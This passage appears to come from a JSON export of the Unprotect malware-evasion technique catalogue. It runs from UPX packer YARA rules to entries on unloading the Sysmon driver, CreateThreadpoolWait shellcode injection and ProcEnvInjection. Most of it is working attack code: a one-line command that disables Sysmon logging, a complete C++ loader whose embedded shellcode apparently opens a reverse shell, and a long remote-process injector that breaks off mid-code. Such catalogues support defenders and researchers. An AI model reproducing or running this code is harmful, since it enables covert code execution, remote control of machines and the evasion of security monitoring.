33 53 45 12 83 C2 04 39 CA 7E F3 89 CA 8B 42 04 8D 18 29 02 BB 78 56 00 00 83 EA 04 3B 14 24 7D EC C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_020_COM: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 00 00 BE 00 00 BF C0 FF BD FF FF FD F3 A4 FC F7 E1 93 87 F7 83 C6 31 57 57 E9 3C FE 55 50 58 21 03 01 02 87 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_125_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 31 2E 32 35 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0761_dos_exe_Hint_DOS_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? 89 F7 1E A9 ?? ?? 8C C8 05 ?? ?? 8E D8 05 ?? ?? 8E C0 FD F3 A5 FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_072: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXFreak_01_Borland_Delphi_HMX0101: PEiD\r\n{\r\n    strings:\r\n        $a = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Unknown_UPX_Scrambler_vna: PEiD\r\n{\r\n    strings:\r\n        $a = { C7 45 FC ?? ?? ?? ?? 6A 04 6A 00 6A 00 68 FF FF FB FF FF 15 ?? ?? ?? ?? 85 C0 7E ?? 6A 00 FF 15 ?? ?? ?? ?? 8B 45 FC 8B 40 04 83 E8 03 8B 4D FC 89 41 04 83 65 F4 00 EB ?? 8B 45 F4 40 89 45 F4 8B 45 FC 8B 4D F4 3B 48 04 73 ?? 8B 45 FC 8B 40 04 2B 45 F4 8B 4D FC 8B 09 8B 55 FC 8B 44 01 FF 33 42 0C 8B 4D FC 8B 49 04 2B 4D F4 8B 55 FC 8B 12 89 44 11 FF EB ?? 8B 45 FC 8B 40 08 89 45 F8 8B 45 F8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Unknown_UPX_or_File_modifyer: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 02 00 00 00 CD 03 5A 81 C2 86 EA FE FF 81 C2 45 23 01 00 89 D1 81 C1 3C 05 00 00 52 81 2A 33 53 45 12 83 C2 04 39 CA 7E F3 89 CA 8B 42 04 8D 18 29 02 BB 78 56 00 00 83 EA 04 3B 14 24 7D EC C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v062_DLL_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_051_072_COM: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 00 00 BE 00 00 BF C0 FF FD F3 A4 FC F7 E1 93 87 F7 83 EE 00 19 ED 57 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 182,
            "unprotect_id": "U0407",
            "name": "Unloading Sysmon Driver",
            "categories": [
                {
                    "id": 6,
                    "key": "anti-monitoring",
                    "label": "Anti-Monitoring"
                }
            ],
            "description": "Sysmon can be used to monitor the system activity. Unloading Sysmon driver will cause the system to stop recording sysmon event logs thus avoiding the monitoring.",
            "resources": "https://www.ired.team/offensive-security/defense-evasion/unloading-sysmon-driver",
            "tags": "",
            "snippets": [
                {
                    "id": 92,
                    "language": {
                        "id": 7,
                        "label": "cmd",
                        "code_class": "cmd"
                    },
                    "author": {
                        "id": 3,
                        "name": "Unprotect",
                        "email": null,
                        "linkedin": null,
                        "twitter": "https://twitter.com/hashtag/unprotectproject",
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/182/",
                    "description": "",
                    "plain_code": "fltMC.exe unload SysmonDrv"
                }
            ],
            "detection_rules": []
        },
        {
            "id": 181,
            "unprotect_id": "U1236",
            "name": "Shellcode Injection via CreateThreadpoolWait",
            "categories": [
                {
                    "id": 4,
                    "key": "process-manipulating",
                    "label": "Process Manipulating"
                }
            ],
            "description": "Malware can inject shellcode via `CreateThreadpoolWait` API.\r\n\r\n1. `CreateEvent` is used to create an event object with a Signaled state.\r\n2. RWX memory for the shellcode is allocated with `VirtualAlloc` and the shellcode is written there.\r\n3. `CreateThreadpoolWait` is used to create a wait object. First argument of the function is a callback function, which will be called once the wait ends (immediately in our case, since our waitable event is in the Signaled state from the start). We will pass the address of our shellcode (allocated in step 2) as the callback function.\r\n4. `SetThreadpoolWait` is used to set wait object to the wait object created in step 3.\r\n5. `WaitForSingleObject` is used to wait for the waitable object to become Signaled, but since our event (waitable) object was created with a Signaled state in step 1, our callback function specified in step 3 is called and the shellcode is executed right away:",
            "resources": "https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-via-createthreadpoolwait",
            "tags": "injection",
            "snippets": [
                {
                    "id": 89,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 3,
                        "name": "Unprotect",
                        "email": null,
                        "linkedin": null,
                        "twitter": "https://twitter.com/hashtag/unprotectproject",
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/181/",
                    "description": "Original source code: https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-via-createthreadpoolwait",
                    "plain_code": "#include <windows.h>\r\n#include <threadpoolapiset.h>\r\n\r\nunsigned char shellcode[] = \r\n\"\\xfc\\x48\\x83\\xe4\\xf0\\xe8\\xc0\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\"\r\n\"\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\"\r\n\"\\x8b\\x52\\x20\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\"\r\n\"\\x48\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\"\r\n\"\\x01\\xc1\\xe2\\xed\\x52\\x41\\x51\\x48\\x8b\\x52\\x20\\x8b\\x42\\x3c\\x48\"\r\n\"\\x01\\xd0\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x67\\x48\\x01\"\r\n\"\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\\x49\\x01\\xd0\\xe3\\x56\\x48\"\r\n\"\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\"\r\n\"\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\x38\\xe0\\x75\\xf1\\x4c\\x03\\x4c\"\r\n\"\\x24\\x08\\x45\\x39\\xd1\\x75\\xd8\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\"\r\n\"\\x66\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\"\r\n\"\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\"\r\n\"\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\\x59\\x5a\\x48\"\r\n\"\\x8b\\x12\\xe9\\x57\\xff\\xff\\xff\\x5d\\x49\\xbe\\x77\\x73\\x32\\x5f\\x33\"\r\n\"\\x32\\x00\\x00\\x41\\x56\\x49\\x89\\xe6\\x48\\x81\\xec\\xa0\\x01\\x00\\x00\"\r\n\"\\x49\\x89\\xe5\\x49\\xbc\\x02\\x00\\x01\\xbb\\xc0\\xa8\\x38\\x66\\x41\\x54\"\r\n\"\\x49\\x89\\xe4\\x4c\\x89\\xf1\\x41\\xba\\x4c\\x77\\x26\\x07\\xff\\xd5\\x4c\"\r\n\"\\x89\\xea\\x68\\x01\\x01\\x00\\x00\\x59\\x41\\xba\\x29\\x80\\x6b\\x00\\xff\"\r\n\"\\xd5\\x50\\x50\\x4d\\x31\\xc9\\x4d\\x31\\xc0\\x48\\xff\\xc0\\x48\\x89\\xc2\"\r\n\"\\x48\\xff\\xc0\\x48\\x89\\xc1\\x41\\xba\\xea\\x0f\\xdf\\xe0\\xff\\xd5\\x48\"\r\n\"\\x89\\xc7\\x6a\\x10\\x41\\x58\\x4c\\x89\\xe2\\x48\\x89\\xf9\\x41\\xba\\x99\"\r\n\"\\xa5\\x74\\x61\\xff\\xd5\\x48\\x81\\xc4\\x40\\x02\\x00\\x00\\x49\\xb8\\x63\"\r\n\"\\x6d\\x64\\x00\\x00\\x00\\x00\\x00\\x41\\x50\\x41\\x50\\x48\\x89\\xe2\\x57\"\r\n\"\\x57\\x57\\x4d\\x31\\xc0\\x6a\\x0d\\x59\\x41\\x50\\xe2\\xfc\\x66\\xc7\\x44\"\r\n\"\\x24\\x54\\x01\\x01\\x48\\x8d\\x44\\x24\\x18\\xc6\\x00\\x68\\x48\\x89\\xe6\"\r\n\"\\x56\\x50\\x41\\x50\\x41\\x50\\x41\\x50\\x49\\xff\\xc0\\x41\\x50\\x49\\xff\"\r\n\"\\xc8\\x4d\\x89\\xc1\\x4c\\x89\\xc1\\x41\\xba\\x79\\xcc\\x3f\\x86\\xff\\xd5\"\r\n\"\\x48\\x31\\xd2\\x48\\xff\\xca\\x8b\\x0e\\x41\\xba\\x08\\x87\\x1d\\x60\\xff\"\r\n\"\\xd5\\xbb\\xf0\\xb5\\xa2\\x56\\x41\\xba\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x48\"\r\n\"\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\"\r\n\"\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\\xd5\";\r\n\r\n\r\nint main()\r\n{\r\n\tHANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL);\r\n\tLPVOID shellcodeAddress = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\tRtlMoveMemory(shellcodeAddress, shellcode, sizeof(shellcode));\r\n\r\n\tPTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)shellcodeAddress, NULL, NULL);\r\n\tSetThreadpoolWait(threadPoolWait, event, NULL);\r\n\tWaitForSingleObject(event, INFINITE);\r\n\t\r\n\treturn 0;\r\n}"
                }
            ],
            "detection_rules": []
        },
        {
            "id": 180,
            "unprotect_id": "U0219",
            "name": "Thwarting Stack-Frame Analysis",
            "categories": [
                {
                    "id": 5,
                    "key": "anti-disassembly",
                    "label": "Anti-Disassembly"
                }
            ],
            "description": "Stack Frame — A collection of local variables, arguments passed to the function, return address and previous function’s base pointer. A function can easily be analyzed by extracting information from the stack frame but disassembler’s analysis of stack frame could be defeated by using nefarious tricks.",
            "resources": "https://1malware1.medium.com/anti-disassembly-techniques-e012338f2ae0",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "id": 179,
            "unprotect_id": "U0218",
            "name": "Misusing Structured Exception Handlers",
            "categories": [
                {
                    "id": 5,
                    "key": "anti-disassembly",
                    "label": "Anti-Disassembly"
                }
            ],
            "description": "Structured Exceptions Handlers or SEH chain is a linked list of functions that are used to handle exceptions in a program. These can be misused to fool the disassemblers. FS segment register is used to gain access to thread environment block (TEB), the first structure in TEB is thread information block (TIB) and the first element in TIB is a pointer to SEH chain and it functions as a stack.",
            "resources": "https://1malware1.medium.com/anti-disassembly-techniques-e012338f2ae0",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "id": 178,
            "unprotect_id": "U1235",
            "name": "ProcEnvInjection - Remote code injection by abusing process environment strings",
            "categories": [
                {
                    "id": 4,
                    "key": "process-manipulating",
                    "label": "Process Manipulating"
                }
            ],
            "description": "This method allows to inject custom code into a remote process without using `WriteProcessMemory` - It will use the `lpEnvironment` parameter in `CreateProcess` to copy the code into the target process. This technique can be used to load a DLL into a remote process, or simply execute a block of code.\r\n\r\nThe `lpEnvironment` parameter in `CreateProcess` allows us to specify a custom environment string for the target process. The environment string contains a set of environment variable entries, such as `PATH=C:\\Windows\\system32;C:\\Windows`. Each environment variable in the list is separated by a null terminator character, and the final entry in the list is a blank string (two null terminator characters). When a new process is created, the environment string will be copied to the virtual memory of the process and it can then be accessed via the PEB.\r\n\r\nIn summary, the injector process takes the following steps:\r\n\r\n1. Create a generic \"code loader\" block which doesn't contain any 0x00 characters - values will be encoded with XOR if necessary.\r\n2. Use `GetEnvironmentStringsW` to retrieve the existing environment string and copy this to a temporary buffer. Our \"generic code loader\" entry will be appended to the end of the existing entries. Some programs make use of the environment variables, so it is not a good idea to overwrite the existing entries.\r\n3. Create a suspended instance of the target EXE process using `CreateProcess` with our custom environment string `lpEnvironment`. We will also use the `CREATE_UNICODE_ENVIRONMENT` flag to specify a wide-char environment value, otherwise the string will be converted from ANSI to wide-char which will break our loader code.\r\n4. Use `NtQueryInformationProcess` to retrieve the PEB address for the target process.\r\n5. Call `NtCreateThreadEx` to call Sleep(0) in the target process and wait for the thread to exit. This will force the necessary PEB fields to become initialised in the target process.\r\n6. Calculate the address of the environment string in the target process (PEB-> `RtlUserProcessParameters` -> Environment)\r\n7. Locate the address of our loader code within the environment string. Call `VirtualProtectEx` to make this data executable.\r\n8. Call `NtCreateThreadEx` to execute the loader code within the target process. This code will read the final payload back from the injector process and execute it.\r\n9. Restore the original memory protection after the payload has finished executing.\r\n10. Call `ResumeThread` to continue normal execution of the target process.",
            "resources": "https://www.x86matthew.com/view_post?id=proc_env_injection",
            "tags": "",
            "snippets": [
                {
                    "id": 75,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 3,
                        "name": "Unprotect",
                        "email": null,
                        "linkedin": null,
                        "twitter": "https://twitter.com/hashtag/unprotectproject",
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/178/",
                    "description": "Author: @x86matthew",
                    "plain_code": "#include <stdio.h>\r\n#include <windows.h>\r\n\r\n#define LOADER_CODE_OFFSET 8\r\n\r\nstruct PROCESS_BASIC_INFORMATION\r\n{\r\n\tDWORD ExitStatus;\r\n\tBYTE *PebBaseAddress;\r\n\tDWORD *AffinityMask;\r\n\tDWORD BasePriority;\r\n\tDWORD *UniqueProcessId;\r\n\tDWORD *InheritedFromUniqueProcessId;\r\n};\r\n\r\n#define ProcessBasicInformation 0\r\n\r\nDWORD (WINAPI *NtQueryInformationProcess)(HANDLE hProcessHandle, DWORD ProcessInformationClass, PVOID ProcessInformation, DWORD ProcessInformationLength, DWORD *ReturnLength);\r\nDWORD (WINAPI *NtCreateThreadEx)(HANDLE *phThreadHandle, DWORD DesiredAccess, PVOID ObjectAttributes, HANDLE hProcessHandle, PVOID StartRoutine, PVOID Argument, ULONG CreateFlags, DWORD *pZeroBits, SIZE_T StackSize, SIZE_T MaximumStackSize, PVOID AttributeList);\r\n\r\nBYTE bGlobal_LoaderCode[] =\r\n{\r\n\t// prefix\r\n\t'A', 0x00, 'A', 0x00, 'A', 0x00, '=', 0x00,\r\n\r\n\t// push edi\r\n\t0x57,\r\n\t// push esi\r\n\t0x56,\r\n\r\n\t// push 0x40 (PAGE_EXECUTE_READWRITE)\r\n\t0x6A, 0x40,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// push eax (MEM_COMMIT | MEM_RESERVE)\r\n\t0x50,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// push eax (Size)\r\n\t0x50,\r\n\t// xor eax, eax\r\n\t0x33, 0xC0,\r\n\t// push eax (BaseAddr)\r\n\t0x50,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// call eax (VirtualAlloc)\r\n\t0xFF, 0xD0,\r\n\r\n\t// mov edi, eax (DataAddr)\r\n\t0x8B, 0xF8,\r\n\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// push eax (ProcessID)\r\n\t0x50,\r\n\t// xor eax, eax\r\n\t0x33, 0xC0,\r\n\t// push eax (bInheritHandle)\r\n\t0x50,\r\n\t// push 0x10 (PROCESS_VM_READ)\r\n\t0x6A, 0x10,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// call eax (OpenProcess)\r\n\t0xFF, 0xD0,\r\n\r\n\t// mov esi, eax (ProcessHandle)\r\n\t0x8B, 0xF0,\r\n\r\n\t// xor eax, eax\r\n\t0x33, 0xC0,\r\n\t// push eax (NumberOfBytesRead)\r\n\t0x50,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// push eax (BytesToRead)\r\n\t0x50,\r\n\t// push edi (ReadBuffer)\r\n\t0x57,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// push eax (BaseAddr)\r\n\t0x50,\r\n\t// push esi (ProcessHandle)\r\n\t0x56,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// call eax (ReadProcessMemory)\r\n\t0xFF, 0xD0,\r\n\r\n\t// push esi (ProcessHandle)\r\n\t0x56,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// call eax (CloseHandle)\r\n\t0xFF, 0xD0,\r\n\r\n\t// pushad\r\n\t0x60,\r\n\t// call edi (DataAddr)\r\n\t0xFF, 0xD7,\r\n\t// popad\r\n\t0x61,\r\n\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// push eax (MEM_RELEASE)\r\n\t0x50,\r\n\t// xor eax, eax\r\n\t0x33, 0xC0,\r\n\t// push eax (Size)\r\n\t0x50,\r\n\t// push edi (DataAddr)\r\n\t0x57,\r\n\t// mov eax, 0xXXXXXXXX\r\n\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t// xor eax, 0xXXXXXXXX\r\n\t0x35, 0x44, 0x33, 0x22, 0x11,\r\n\t// call eax (VirtualFree)\r\n\t0xFF, 0xD0,\r\n\r\n\t// pop esi\r\n\t0x5E,\r\n\t// pop edi\r\n\t0x5F,\r\n\r\n\t// return from thread cleanly - can't use \"retn 4\"\r\n\t// pop eax\r\n\t0x58,\r\n\t// pop ecx\r\n\t0x59,\r\n\t// push eax\r\n\t0x50,\r\n\t// ret\r\n\t0xC3,\r\n\r\n\t// (end of string - 2 widechar null characters)\r\n\t0x00, 0x00, 0x00, 0x00\r\n};\r\n\r\nDWORD EncodeDwordValue(DWORD dwValue, DWORD *pdwXorValue, DWORD *pdwEncodedValue)\r\n{\r\n\tBYTE bOrigValue[4];\r\n\tBYTE bXorValue[4];\r\n\tBYTE bEncodedValue[4];\r\n\r\n\t// copy original value\r\n\tmemcpy((void*)bOrigValue, (void*)&dwValue, sizeof(DWORD));\r\n\r\n\t// encode value\r\n\tfor(DWORD i = 0; i < sizeof(DWORD); i++)\r\n\t{\r\n\t\tbXorValue[i] = 0x01;\r\n\t\tfor(;;)\r\n\t\t{\r\n\t\t\t// ensure the value contains no 0x00 bytes\r\n\t\t\tbEncodedValue[i] = bOrigValue[i] ^ bXorValue[i];\r\n\t\t\tif(bEncodedValue[i] == 0 || bXorValue[i] == 0)\r\n\t\t\t{\r\n\t\t\t\tbXorValue[i]++;\r\n\t\t\t\tcontinue;\r\n\t\t\t}\r\n\r\n\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\r\n\t// store values\r\n\t*pdwXorValue = *(DWORD*)bXorValue;\r\n\t*pdwEncodedValue = *(DWORD*)bEncodedValue;\r\n\r\n\treturn 0;\r\n}\r\n\r\nDWORD StartInjectedProcess(char *pExePath, BYTE *pPayload, DWORD dwPayloadSize)\r\n{\r\n\tSTARTUPINFO StartupInfo;\r\n\tPROCESS_INFORMATION ProcessInfo;\r\n\tBYTE bLoaderCode_Copy[sizeof(bGlobal_LoaderCode)];\r\n\tPROCESS_BASIC_INFORMATION ProcessBasicInfoData;\r\n\tBYTE *pRemotePtr_RtlUserProcessParameters = NULL;\r\n\tBYTE *pRemotePtr_EnvironmentStr = NULL;\r\n\tDWORD dwOriginalProtect = 0;\r\n\tHANDLE hThread = NULL;\r\n\tDWORD dwTempProtect = 0;\r\n\twchar_t *pOrigEnvBlock = NULL;\r\n\tDWORD dwOrigEnvBlockTotalLengthBytes = 0;\r\n\tDWORD dwCurrEnvEntryLength = 0;\r\n\twchar_t *pCurrEnvEntry = NULL;\r\n\tBYTE *pNewEnvBlock = NULL;\r\n\r\n\t// ensure the loader code is 16-bit aligned\r\n\tif((sizeof(bGlobal_LoaderCode) % 2) != 0)\r\n\t{\r\n\t\tprintf(\"Error: Loader code is out of alignment\\n\");\r\n\t\t// loader code is out of alignment - add an extra 0x00 character to the end of the data\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tprintf(\"Generating loader code...\\n\");\r\n\r\n\t// encode values in the loader code to ensure no 0x00 characters exist\r\n\tEncodeDwordValue(MEM_COMMIT | MEM_RESERVE, (DWORD*)&bGlobal_LoaderCode[13], (DWORD*)&bGlobal_LoaderCode[18]);\r\n\tEncodeDwordValue(dwPayloadSize, (DWORD*)&bGlobal_LoaderCode[24], (DWORD*)&bGlobal_LoaderCode[29]);\r\n\tEncodeDwordValue((DWORD)VirtualAlloc, (DWORD*)&bGlobal_LoaderCode[38], (DWORD*)&bGlobal_LoaderCode[43]);\r\n\tEncodeDwordValue(GetCurrentProcessId(), (DWORD*)&bGlobal_LoaderCode[52], (DWORD*)&bGlobal_LoaderCode[57]);\r\n\tEncodeDwordValue((DWORD)OpenProcess, (DWORD*)&bGlobal_LoaderCode[68], (DWORD*)&bGlobal_LoaderCode[73]);\r\n\tEncodeDwordValue(dwPayloadSize, (DWORD*)&bGlobal_LoaderCode[85], (DWORD*)&bGlobal_LoaderCode[90]);\r\n\tEncodeDwordValue((DWORD)pPayload, (DWORD*)&bGlobal_LoaderCode[97], (DWORD*)&bGlobal_LoaderCode[102]);\r\n\tEncodeDwordValue((DWORD)ReadProcessMemory, (DWORD*)&bGlobal_LoaderCode[109], (DWORD*)&bGlobal_LoaderCode[114]);\r\n\tEncodeDwordValue((DWORD)CloseHandle, (DWORD*)&bGlobal_LoaderCode[122], (DWORD*)&bGlobal_LoaderCode[127]);\r\n\tEncodeDwordValue(MEM_RELEASE, (DWORD*)&bGlobal_LoaderCode[138], (DWORD*)&bGlobal_LoaderCode[143]);\r\n\tEncodeDwordValue((DWORD)VirtualFree, (DWORD*)&bGlobal_LoaderCode[153], (DWORD*)&bGlobal_LoaderCode[158]);\r\n\r\n\tprintf(\"Appending code to existing environment string...\\n\");\r\n\r\n\t// get existing environment block\r\n\tpOrigEnvBlock = GetEnvironmentStringsW();\r\n\tif(pOrigEnvBlock == NULL)\r\n\t{\r\n\t\tprintf(\"Error: Failed to read environment strings\\n\");\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// calculate length of existing environment block\r\n\tfor(;;)\r\n\t{\r\n\t\t// get current environment string entry\r\n\t\tpCurrEnvEntry = (wchar_t*)((BYTE*)pOrigEnvBlock + dwOrigEnvBlockTotalLengthBytes);\r\n\r\n\t\t// calculate length\r\n\t\tdwCurrEnvEntryLength = wcslen(pCurrEnvEntry);\r\n\t\tif(dwCurrEnvEntryLength == 0)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\t// increase total size counter\r\n\t\tdwOrigEnvBlockTotalLengthBytes += ((dwCurrEnvEntryLength + 1) * sizeof(wchar_t));\r\n\t}\r\n\r\n\t// allocate a new environment string buffer\r\n\tpNewEnvBlock = (BYTE*)VirtualAlloc(NULL, dwOrigEnvBlockTotalLengthBytes + sizeof(bGlobal_LoaderCode), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\r\n\tif(pNewEnvBlock == NULL)\r\n\t{\r\n\t\tprintf(\"Error: Failed to allocate local memory\\n\");\r\n\r\n\t\t// error\r\n\t\tFreeEnvironmentStringsW(pOrigEnvBlock);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// copy the original values and append the loader code\r\n\tmemcpy((void*)pNewEnvBlock, pOrigEnvBlock, dwOrigEnvBlockTotalLengthBytes);\r\n\tmemcpy((void*)(pNewEnvBlock + dwOrigEnvBlockTotalLengthBytes), bGlobal_LoaderCode, sizeof(bGlobal_LoaderCode));\r\n\r\n\t// free temporary environment string buffer\r\n\tFreeEnvironmentStringsW(pOrigEnvBlock);\r\n\r\n\tprintf(\"Creating target process: '%s'...\\n\", pExePath);\r\n\r\n\t// launch target process with the injection code in the environment strings\t\r\n\tmemset(&StartupInfo, 0, sizeof(StartupInfo));\r\n\tStartupInfo.cb = sizeof(StartupInfo);\r\n\tif(CreateProcess(NULL, pExePath, NULL, NULL, 0, CREATE_NEW_CONSOLE | CREATE_UNICODE_ENVIRONMENT | CREATE_SUSPENDED, (wchar_t*)pNewEnvBlock, NULL, &StartupInfo, &ProcessInfo) == 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to launch target process\\n\");\r\n\r\n\t\t// error\r\n\t\tVirtualFree(pNewEnvBlock, 0, MEM_RELEASE);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// free environment block buffer\r\n\tVirtualFree(pNewEnvBlock, 0, MEM_RELEASE);\r\n\r\n\tprintf(\"Locating target code in remote process...\\n\");\r\n\r\n\t// get process info\r\n\tmemset((void*)&ProcessBasicInfoData, 0, sizeof(ProcessBasicInfoData));\r\n\tif(NtQueryInformationProcess(ProcessInfo.hProcess, ProcessBasicInformation, &ProcessBasicInfoData, sizeof(ProcessBasicInfoData), NULL) != 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to retrieve process info\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// create a thread that calls Sleep(0) to initialise the environment strings in the PEB\r\n\tif(NtCreateThreadEx(&hThread, 0x001FFFFF, NULL, ProcessInfo.hProcess, Sleep, (LPVOID)0, 0, NULL, 0, 0, NULL) != 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to create Sleep thread in remote process\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\tWaitForSingleObject(hThread, INFINITE);\r\n\tCloseHandle(hThread);\r\n\r\n\t// read RtlUserProcessParameters ptr from PEB\r\n\tif(ReadProcessMemory(ProcessInfo.hProcess, (void*)(ProcessBasicInfoData.PebBaseAddress + 0x10), (void*)&pRemotePtr_RtlUserProcessParameters, sizeof(BYTE*), NULL) == 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to read RtlUserProcessParameters value from PEB\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// read EnvironmentStr ptr from RtlUserProcessParameters\r\n\tif(ReadProcessMemory(ProcessInfo.hProcess, 